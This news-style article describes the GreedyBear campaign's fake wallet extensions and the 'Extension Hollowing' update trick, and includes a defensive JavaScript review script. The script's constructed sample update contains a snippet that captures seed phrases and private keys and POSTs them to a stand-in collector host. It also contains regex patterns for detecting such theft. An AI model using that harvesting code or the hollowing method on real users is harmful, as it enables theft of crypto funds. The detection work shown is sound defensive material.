How GreedyBear's Weaponized Browser Extensions Compromised Over $1M in Crypto Holdings


A sophisticated cybercriminal operation has been unmasked by Koi Security researchers, revealing an extensive campaign orchestrated by the Russian threat group GreedyBear. Over a five-week period ending in August, the attackers successfully siphoned more than $1 million in cryptocurrency through a multi-layered attack infrastructure.

The Arsenal: 150 Browser Extensions and Nearly 500 Malicious Executables

The scale of this operation was staggering. GreedyBear deployed 150 weaponized Firefox extensions alongside dozens of deceptive websites built to mimic legitimate platforms. In parallel, the group pushed nearly 500 malicious Windows executables through Russian websites that host pirated and repackaged software. According to Idan Dardikman, CTO at Koi Security, the Firefox-based assault proved to be the most lucrative vector, generating the majority of the $1 million haul.

The Wallet Spoofing Technique

The primary mechanism involved creating counterfeit versions of popular cryptocurrency wallets. The hackers targeted MetaMask, Exodus, Rabby Wallet, and TronLink—among the most widely used self-custody solutions in the crypto ecosystem.

The attackers used a technique Koi Security calls Extension Hollowing to get past marketplace review. It works in stages: first, a harmless-looking version of the extension is submitted to the official add-on store and passes initial vetting. Once approved, the extension receives incremental updates that introduce the malicious code, and automated re-checks do not catch the change. The weakness being exploited is that the store's trust decision is made once, at first submission, while later updates that widen the extension's permissions and change its behaviour inherit that trust. To bolster credibility, the threat actors also seeded fake positive reviews, creating an illusion of trustworthiness that encouraged installs.

Credential Theft and Beyond

Once unsuspecting users installed a compromised extension, it began harvesting wallet credentials and private keys for the attackers. Those secrets are the keys to the kingdom in self-custody: whoever holds them controls the funds, and the attackers used them to drain the compromised wallets.
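The two preceding sections describe a benign first release followed by an update that widens the extension's reach and starts capturing wallet secrets. The script below is an added example, not Koi Security's code nor any wallet vendor's: a static review that diffs a vetted release against a proposed update and flags exactly that combination. The manifests, the "helper.js" contents, the host names and the indicator regexes are all constructed for illustration.

```javascript
// Added example (not Koi Security's code, nor any wallet vendor's): a static
// review that compares a vetted extension release with a proposed update and
// flags the "extension hollowing" signature: widened scope plus newly added
// credential-harvesting and exfiltration code. Every manifest, script and host
// name below is constructed for illustration.

// Permissions and host patterns whose first appearance in an update deserves a human look.
const SENSITIVE_SCOPE = new Set([
  "<all_urls>", "*://*/*", "tabs", "webRequest", "webRequestBlocking",
  "cookies", "clipboardRead", "nativeMessaging", "history", "scripting",
]);

// Heuristic indicators of credential harvesting in an extension's scripts.
const INDICATORS = [
  { name: "wallet-secret keyword", re: /\b(mnemonic|seed ?phrase|recovery ?phrase|private ?key)\b/i },
  { name: "form input capture", re: /addEventListener\(\s*['"](input|keyup|keydown|submit|paste)['"]/ },
  { name: "outbound HTTP send", re: /\b(fetch|sendBeacon|XMLHttpRequest)\b[\s\S]{0,60}['"`]https?:\/\// },
];

// Everything in a manifest that decides where the extension runs or what it can touch.
function scopeOf(manifest) {
  const scope = new Set([...(manifest.permissions || []), ...(manifest.host_permissions || [])]);
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) scope.add(m);
  }
  return scope;
}

// Indicator names that fire anywhere in a version's scripts (`files` maps path -> source).
function indicatorsIn(files) {
  const hits = new Set();
  for (const src of Object.values(files)) {
    for (const ind of INDICATORS) if (ind.re.test(src)) hits.add(ind.name);
  }
  return hits;
}

// Hosts referenced by the scripts that are not the legitimate wallet's own domains.
function unexpectedHosts(files, allowedHosts) {
  const hosts = new Set();
  for (const src of Object.values(files)) {
    for (const m of src.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  }
  return [...hosts].filter((h) => !allowedHosts.has(h));
}

// Diff a vetted release against a proposed update and rate the hollowing risk.
function reviewUpdate(previous, update, allowedHosts) {
  const before = scopeOf(previous.manifest);
  const addedScope = [...scopeOf(update.manifest)].filter((s) => !before.has(s));
  const sensitiveScope = addedScope.filter((s) => SENSITIVE_SCOPE.has(s));

  // Only capabilities absent from the vetted version count: they are exactly
  // what a store's one-time review never saw.
  const seen = indicatorsIn(previous.files);
  const newIndicators = [...indicatorsIn(update.files)].filter((n) => !seen.has(n));
  const hosts = unexpectedHosts(update.files, allowedHosts);

  let risk = "low";
  if (sensitiveScope.length > 0) risk = "medium";
  const harvests = newIndicators.includes("wallet-secret keyword") || newIndicators.includes("form input capture");
  if (harvests && newIndicators.includes("outbound HTTP send") && hosts.length > 0) risk = "high";

  return { addedScope, sensitiveScope, newIndicators, unexpectedHosts: hosts, risk };
}

// Constructed sample: a harmless 1.0.0 release that passed review, and its 1.0.1 update.
const VETTED_RELEASE = {
  manifest: {
    name: "Wallet Helper", version: "1.0.0", manifest_version: 2,
    permissions: ["storage"],
    content_scripts: [{ matches: ["https://wallet.example/*"], js: ["helper.js"] }],
  },
  files: { "helper.js": "document.documentElement.dataset.walletHelper = 'ready';" },
};

const PROPOSED_UPDATE = {
  manifest: {
    name: "Wallet Helper", version: "1.0.1", manifest_version: 2,
    permissions: ["storage", "tabs", "<all_urls>"],
    content_scripts: [{ matches: ["<all_urls>"], js: ["helper.js"] }],
  },
  files: {
    "helper.js": [
      "document.addEventListener('input', (e) => {",
      "  const label = (e.target.placeholder || '') + ' ' + (e.target.name || '');",
      "  if (/seed phrase|private key/i.test(label)) {",
      "    fetch('https://collector.example.invalid/c', { method: 'POST', body: e.target.value });",
      "  }",
      "});",
    ].join("\n"),
  },
};

// Domains the legitimate wallet is known to use (assumed known to the reviewer).
const WALLET_HOSTS = new Set(["wallet.example"]);

function demo() {
  return reviewUpdate(VETTED_RELEASE, PROPOSED_UPDATE, WALLET_HOSTS);
}

console.log(JSON.stringify(demo(), null, 2));
```

The review keys on the delta, not on the update in isolation: a wallet extension legitimately contains the words "seed phrase" and makes HTTPS calls, so scanning any single version would drown in false positives. What is unusual is a release that never needed those capabilities suddenly gaining them together with `<all_urls>` and a host outside the wallet's own domains. The same logic applies whether the reviewer is the store, an enterprise allow-listing extensions, or a user checking what an update changed.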

Beyond the browser, the executables distributed through the Russian software mirrors delivered a broader toolkit: credential stealers, ransomware, and assorted Trojan variants. This diversification gave the group several independent paths onto victim systems and to the data on them.

The campaign underscores a critical weakness in the security chain: the trust users place in official-looking extensions, and the ease with which an attacker can abuse the update channel of a legitimate distribution platform, where trust earned once at submission carries over to every later version.
